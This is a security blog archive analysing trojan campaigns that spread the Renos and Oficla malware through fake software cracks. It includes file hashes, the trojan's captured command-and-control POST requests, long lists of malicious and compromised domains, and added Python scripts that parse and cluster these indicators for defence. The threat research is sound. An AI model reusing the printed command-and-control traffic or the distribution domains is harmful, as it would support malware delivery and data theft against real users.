Tag Archives: renos trojan

Free download cracked software with surprise

We have logged another website used to capture keywords related to software and to spread the Renos trojan and other dangerous threats as executable files posing as software cracks and keygens. The website uses blackhat SEO strategies to attract as many users as possible and to appear on the first pages of search engine results.

Cracked Software Website

The file that is downloaded from the dangerous website is:

Downloaded File

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that every time we tried to download the infected file, it had a different MD5 checksum. This means that most probably the payload is created on the fly, or that various executable versions of the malware are stored on the server and served at random. It is possible this is done to make sure the website always distributes an up-to-date malware executable that is not yet detected by security software.
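The four scan reports above share one file name and one file size but carry four different hashes. The script below is an added example (it is not part of the original post and not a tool the authors used): it parses report blocks in the plain-text layout shown above, then groups them by file name and size and keeps the groups whose members have more than one distinct MD5, which is exactly the server-side polymorphism the post describes. The report text embedded in the script is a copy of the four reports quoted above.

```python
import re
from collections import defaultdict

# Constructed sample: the four scan reports quoted in the post, in the
# plain-text layout the post uses (one block per download attempt).
REPORTS = """Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED
"""

# One "Field value" line per report row; "Detections" carries a colon.
FIELD_RE = re.compile(
    r"^(Report|File Name|File Size|File Type|MD5 Hash|SHA1 Hash|Detections|Status)"
    r":?\s+(.+?)\s*$"
)


def parse_reports(text):
    """Turn blank-line separated report blocks into dicts keyed by field name."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                rec[m.group(1)] = m.group(2)
        if rec:
            records.append(rec)
    return records


def file_size(rec):
    """'180224 bytes' -> 180224."""
    return int(rec["File Size"].split()[0])


def detection_ratio(rec):
    """'2 / 16 (13 %)' -> 0.125 (engines that flagged the file / engines run)."""
    hit, total = re.match(r"(\d+)\s*/\s*(\d+)", rec["Detections"]).groups()
    return int(hit) / int(total)


def polymorphic_groups(records):
    """Group reports by (file name, size) and keep only the groups whose
    members carry more than one distinct MD5: the same download served as a
    different binary each time. Returns {(name, size): sorted md5 list}."""
    groups = defaultdict(list)
    for rec in records:
        groups[(rec["File Name"], file_size(rec))].append(rec["MD5 Hash"].lower())
    return {k: sorted(set(v)) for k, v in groups.items() if len(set(v)) > 1}


if __name__ == "__main__":
    recs = parse_reports(REPORTS)
    for (name, size), md5s in polymorphic_groups(recs).items():
        print(f"{name} ({size} bytes): {len(md5s)} distinct MD5 hashes")
        for h in md5s:
            print("  ", h)
    print(f"best detection rate seen: {max(detection_ratio(r) for r in recs):.0%}")
```

Because the size never changes while the hash does, a hash blocklist is the wrong control for this site; a fuzzy hash (ssdeep) or a signature on the unchanging part of the binary would be the next check to run on the four samples, and the download URL itself is the indicator worth blocking.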

During the analysis, the following files have been created in our system:

Created Files

Suspicious DNS queries:

megadataonline .net
mydynatri .net
zoozus .com
threezio .com
sina.com .cn
waytoall .com
topdworld .com
thevehic .com
ad.tlvmedia .com

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware appears to have posted a large amount of encrypted data to various website URLs using the POST method, and at the end it received commands to visit some advertisement links.
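The captured traffic shows the traits a defender can key on: form-encoded POST bodies sent to URLs that end in .gif, long opaque hexadecimal tokens in the path, and no Referer on any of the POSTs. The following script is an added example (not part of the original post and not a tool of the authors): it parses the requests above from a plain-text capture, scores each one against those three indicators, and flags a request when at least two of them match. The capture embedded in the script is a copy of the requests listed above; hosts keep the defanged "name .tld" spelling the post uses and the parser removes that space before matching.

```python
import re

# Constructed sample: the requests captured in the post, one per paragraph,
# copied with the post's defanged host spelling ("zoozus .com").
CAPTURE = """POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net

POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net

POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com

POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com

POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com

POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com

GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com

GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com
"""

IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png", ".ico")
# 24 or more consecutive hex digits in a URL: an opaque identifier, not a page.
HEX_TOKEN = re.compile(r"[0-9a-f]{24,}")


def parse_requests(text):
    """Split a blank-line separated capture into request dicts."""
    reqs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        method, target, _version = lines[0].split()
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        host = headers.get("host", "").replace(" ", "")  # undo defanging
        reqs.append({"method": method, "target": target, "host": host, "headers": headers})
    return reqs


def beacon_indicators(req):
    """Return the list of indicator names that match this request."""
    path = req["target"].split("?", 1)[0]
    reasons = []
    # A browser never submits a form to an image; a bot posting data does.
    if req["method"] == "POST" and path.lower().endswith(IMAGE_EXT):
        reasons.append("post-to-image-url")
    if HEX_TOKEN.search(req["target"]):
        reasons.append("opaque-hex-token-in-url")
    # Form posts from a page normally carry the page as Referer.
    if req["method"] == "POST" and "referer" not in req["headers"]:
        reasons.append("post-without-referer")
    return reasons


def flag_beacons(reqs, threshold=2):
    """Requests matching at least `threshold` indicators, as (host, target, reasons)."""
    flagged = []
    for req in reqs:
        reasons = beacon_indicators(req)
        if len(reasons) >= threshold:
            flagged.append((req["host"], req["target"], reasons))
    return flagged


if __name__ == "__main__":
    for host, target, reasons in flag_beacons(parse_requests(CAPTURE)):
        print(f"{host}{target[:60]}  <- {', '.join(reasons)}")
```

With the threshold at two, the three .gif POSTs are flagged and the plain .php POSTs are not; lowering the threshold to one also catches those, at the cost of flagging every ordinary form submission made without a Referer, so in practice the single-indicator hits are better handled by correlating the Host against the domain list above.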

Domain & IP Analysis:

sotapartners.net – 174.123.211.138 – AS 21844
data-mortgage.com – 78.46.76.170 – AS 24940
megadataonline.net – 64.191.16.70 – AS 21788
mydynatri.net – 77.78.248.84 – AS 42560
zoozus.com – 85.234.190.47 – AS 6851
threezio.com – 77.78.239.42 – AS 42560
waytoall.com – 96.9.157.39 – AS 21788
topdworld.com – 173.212.250.130 – AS 21788
thevehic.com – 173.212.245.243 – AS 21788
ad.tlvmedia.com – 217.163.21.37 – AS 42173

Other suspicious domains hosted in 64.191.16.70:

brodiero.com – 64.191.16.70 – AS 21788
megadatacentral.net – 64.191.16.70 – AS 21788
megadataonline.net – 64.191.16.70 – AS 21788
spiderfile.net – 87.255.51.229 – AS 38930

Other suspicious domains hosted in 85.234.190.47:

chattertune.net – 85.234.190.47 – AS 6851
mybubblebean.com – – AS NA
roonotimex.com – 85.234.190.47 – AS 6851
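The "other suspicious domains hosted in" lists come from pivoting on a shared IP address, and the AS column allows the same pivot one level up. The script below is an added example (not part of the original post) that performs that pivot on the rows above, written as "domain – IP – AS n" records: it clusters domains by IP and by AS, skips the row with no resolved address (mybubblebean.com, AS NA), and reports how many distinct addresses each AS contributed, which is what separates a recurring hosting provider for the campaign from a one-off. The rows embedded in the script are a copy of the three tables above.

```python
import re
from collections import defaultdict

# Constructed sample: the domain / IP / AS rows from the post. A row whose
# domain did not resolve keeps an empty IP field and "AS NA".
ROWS = """sotapartners.net – 174.123.211.138 – AS 21844
data-mortgage.com – 78.46.76.170 – AS 24940
megadataonline.net – 64.191.16.70 – AS 21788
mydynatri.net – 77.78.248.84 – AS 42560
zoozus.com – 85.234.190.47 – AS 6851
threezio.com – 77.78.239.42 – AS 42560
waytoall.com – 96.9.157.39 – AS 21788
topdworld.com – 173.212.250.130 – AS 21788
thevehic.com – 173.212.245.243 – AS 21788
ad.tlvmedia.com – 217.163.21.37 – AS 42173
brodiero.com – 64.191.16.70 – AS 21788
megadatacentral.net – 64.191.16.70 – AS 21788
spiderfile.net – 87.255.51.229 – AS 38930
chattertune.net – 85.234.190.47 – AS 6851
mybubblebean.com – – AS NA
roonotimex.com – 85.234.190.47 – AS 6851
"""

# "domain – IP – AS n"; the IP group is optional so unresolved rows still parse.
ROW_RE = re.compile(
    r"^(?P<domain>\S+)\s+–\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})?\s*–\s+AS\s+(?P<asn>\S+)$"
)


def parse_rows(text):
    """Return a list of (domain, ip or None, asn) tuples."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        rows.append((m["domain"], m["ip"], m["asn"]))
    return rows


def cluster(rows, by="ip", min_size=2):
    """Group domains that share an IP (by='ip') or an AS (by='asn').
    Only clusters with at least `min_size` members are returned, since a lone
    domain on an address is not a pivot. Unresolved rows are ignored."""
    groups = defaultdict(set)
    for domain, ip, asn in rows:
        key = ip if by == "ip" else asn
        if key and key != "NA":
            groups[key].add(domain)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_size}


def as_footprint(rows):
    """AS -> sorted list of distinct IPs seen in that AS."""
    ips = defaultdict(set)
    for _domain, ip, asn in rows:
        if ip:
            ips[asn].add(ip)
    return {k: sorted(v) for k, v in ips.items()}


if __name__ == "__main__":
    rows = parse_rows(ROWS)
    for ip, domains in cluster(rows, by="ip").items():
        print(f"{ip}: {', '.join(domains)}")
    for asn, domains in cluster(rows, by="asn").items():
        print(f"AS{asn} ({len(as_footprint(rows)[asn])} addresses): {', '.join(domains)}")
```

Clustering by AS is a coarser pivot than clustering by IP and will pull in unrelated customers of a large provider, so AS clusters are leads to check with passive DNS or whois rather than a blocklist in themselves; IP clusters on the same address at the same time are much stronger.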

Oficla Trojan spreads through keygens and software cracks

Here is a new list of dangerous domains logged by internal honeypots and submitted by users. They are used to spread trojans, rogue security software and other malicious threats, and some of the domains have a low detection rate as of today:

Rogue Security Software:

www4.checkpc96.co.cc / 209.212.149.23
www4.checkpc97.co.cc / 209.212.149.23
www4.checkpc98.co.cc / 209.212.149.23
www4.checkpc95.co.cc / 209.212.149.23
www4.checkpc94.co.cc / 209.212.149.23
www4.checkpc93.co.cc / 209.212.149.23
www1.makeptotect79.co.cc / 94.228.220.117
www1.makeptotect78.co.cc / 94.228.220.117
www1.makeptotect77.co.cc / 94.228.220.117
www1.makeptotect76.co.cc / 94.228.220.117
www1.makeptotect75.co.cc / 94.228.220.117
www1.makeptotect74.co.cc / 74.3.166.117
www1.makeptotect73.co.cc / 74.3.166.117
www1.makeptotect72.co.cc / 74.3.166.117
www1.makeptotect71.co.cc / 74.3.166.117
www1.makeptotect70.co.cc / 74.3.166.117

Trojan Distribution (Oficla/Renos):

gourlz.net / 178.63.3.138
thestockfiles.com / 69.10.36.218
vo2ov.com / 95.211.10.178
cvaohn.org / 209.123.181.48
mechadairysystems.com / 208.87.240.230
longsoft.org / 64.21.53.43
kenborden.com / 209.123.181.48
hotworldmedia.com / 69.10.36.218

Infected Websites:

absfixer.com/catalog/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
demo.itlinkonline.com/tcartz2/images/news.php?page=keyword (200 OK)
meyal.com/images/news.php?page=keyword (200 OK)
delisuper.com/images/page.php?page=keyword (200 OK)
antoniasecrets.com/catalog/images/news.php?page=keyword (200 OK)
ap2.dataoz.com/catalog/images/page.php?page=keyword (200 OK)
shylittle.com/catalog/images/page.php?page=keyword (200 OK)
dtechsac.com/tienda/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
donegalanglingcentre.com/shop/images/page.php?page=keyword (200 OK)
gravure3d.fr/catalog/images/page.php?page=keyword (200 OK)
exerciseelite.com/images/news.php?page=keyword (200 OK)
econdbike.it/negozio/images/news.php?page=keyword (200 OK)
seobrand.net/private_label/images/news.php?page=keyword (200 OK)

The IP address 209.123.181.48 (AS8001 – NAC Net Access Corp) appears to have hosted, and to still host, a very high number of malicious domains that are mostly used to distribute trojans disguised as keygens or cracks for popular commercial software:

allmusic.com.ua
amorphia.com.ua
artsofboreal.com
botaime.com
c-charts.com
cflor.org
creaweblog.com
cvaohn.org
digitaldepotstore.net
dwrz.com.ua
gsis-bro.com
imvu.com.ua
ineverforget.com
job-hotel.com.ua
k-p.km.ua
kenborden.com
loweimages.com
mail.allmusic.com.ua
mail.amorphia.com.ua
mail.artsofboreal.com
mail.creaweblog.com
mail.cvaohn.org
mail.digitaldepotstore.net
mail.dwrz.com.ua
mail.gsis-bro.com
mail.imvu.com.ua
mail.ineverforget.com
mail.job-hotel.com.ua
mail.k-p.km.ua
mail.kenborden.com
mail.maple-shion.net
mail.newlife3o.com
mail.obama4.in.ua
mail.obogreva.net
mail.pekinform.com.ua
mail.pill-flag.com
mail.ranta-kone.com
mail.serce.com.ua
mail.setite.com
mail.snak.vn.ua
mail.techwave.com.ua
mail.toptvproduct.ru
mail.ukreunov.com.ua
mail.xocit.com
mail.yazv.net
nasharu.org
newenglandgroup.us
newlife3o.com
ns1.obama4.in.ua
ns1.snak.kiev.ua
obama4.in.ua
pekinform.com.ua
pill-flag.com
ranta-kone.com
serce.com.ua
snak.vn.ua
techwave.com.ua
toptvproduct.ru
ukreunov.com.ua
www.botaime.com
www.dwrz.com.ua
www.ineverforget.com
www.loweimages.com
www.nasharu.org
www.xwarezzz.com
xwarezzz.com
yazv.net

Whois details for 209.123.181.48:

NetRange: 209.123.0.0 – 209.123.255.255
CIDR: 209.123.0.0/16
OriginAS: AS8001
NetName: NAC-NETBLK02
NetHandle: NET-209-123-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.NAC.NET
NameServer: NS1.NAC.NET
Comment: Additional Information Available via whois.nac.net
RegDate: 1997-08-06
Updated: 2007-09-18
Ref: http://whois.arin.net/rest/net/NET-209-123-0-0-1

OrgName: Net Access Corporation
OrgId: NAC
Address: 9 Wing Drive
City: Cedar Knolls
StateProv: NJ
PostalCode: 07927
Country: US
RegDate:
Updated: 2008-01-16
Ref: http://whois.arin.net/rest/org/NAC

OrgAbuseHandle: ABUSE156-ARIN
OrgAbuseName: Abuse Department
OrgAbusePhone: +1-800-638-6336
OrgAbuseEmail: XXXXX@nac.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE156-ARIN

The IP address 64.21.53.43 (AS8001 – NAC Net Access Corp) also appears to host malicious domains, in particular longsoft.org, which is used to distribute trojans by promising keygens and cracks for software:

Trojan spreading in action:

Report 2010-08-19 15:09:47 (GMT 1)
File Name paragon.exe
File Size 135168 bytes
File Type Executable File (EXE)
MD5 Hash f1d62efaea0986dd6b8ef1eee470e8dc
SHA1 Hash 90f59e41ad56204390f58f34c61c4aea04538a31
Detections: 3 / 16 ( 19 %)
Status INFECTED

Trojan Activity:

POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)
 
POST /logos/XXX
Host: devtempest.com (91.188.60.233)
 
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)
 
POST /werber/34b520e6b47/217.gif HTTP/1.1
Host: mybubblebean.com (85.234.190.47)
 
POST /perce/XXX
Host: peribox.net (77.78.239.42)

64.21.53.43 (AS8001 – NAC Net Access Corp)

longsoft.org
mail.longsoft.org
mail.real-downloads.net
mail.thenewamsterdams.net
mail.web-zik.com
real-downloads.net
web-zik.com

69.10.36.218 (AS19318 – NJIIX.net 110B Meadowlands Pkwy Secaucus)

mediaidentifier.com
movieregion.com
multimedianame.com
ns1.prominentupstairs.com
realplayerpro.com
yourreload.com

178.63.3.138 (AS24940 – Hetzner Online AG RZ)

gourlz.net
aevitasecuritystore.com
atzan.com
buydedicated.ru
buyvps.ru
ddiscompstore.com
de2.reserver.ru
erosik.com
fasturls.net
finmill.com
funnyseo.biz
hentaix.ru
humorarchive.info
jaguarconsultant.com
keygen-crack.net
kino2012.ru
kinovam.com
mail.all4-sex.info
marconmedia.com
ns1.buydedicated.ru
photo63.www.vk.com.www2in.net
serialpost.net
sey.su
softwareserialnumbers.net
soshinenie.ru
trusted-warez.com
vadoz.ru
www.erosik.com
www.photo63.www.vk.com.www2in.net
www.soshinenie.ru
www.xmancer.org
www2in.net
xmancer.org

208.87.240.230 (AS40676 – Proxy registration for downstream)

bigbizoo.net
grosskopf.net
grrrey.com
mail.konseed.org
mail.richfootball.net
ns1.richfootball.net
ns2.richfootball.net
pixelfish.net
richfootball.net
setite.com
theapps.org
www.setite.com
xocit.com

217.23.5.74 (AS49981 – WorldStream)

billgable.com
dlov.org
softwareshare.org
techrev.net

8.14.147.235 (AS26481 – BONDWEB Bondweb)

directdownloads.ws
loaded.ws
mail.directdownloads.ws
mail.loaded.ws
mail.skinnyrons.com
mail.unlimitedserials.com
skinnyrons.com
unlimitedserials.com
warez411.com
loaded.ws
unlimitedserials.com
warez411.com
unlimitedserials.com

69.55.50.102 (AS23393 – ISPRIME , Inc.)

downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
kevin.internal.realitychecknetwork.com
mail.fulldownload.ws
rcn560.realitychecknetwork.com
sharingaccess.com
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
sharingaccess.com
sharingnova.com

We will stop here for now, but the list is very long!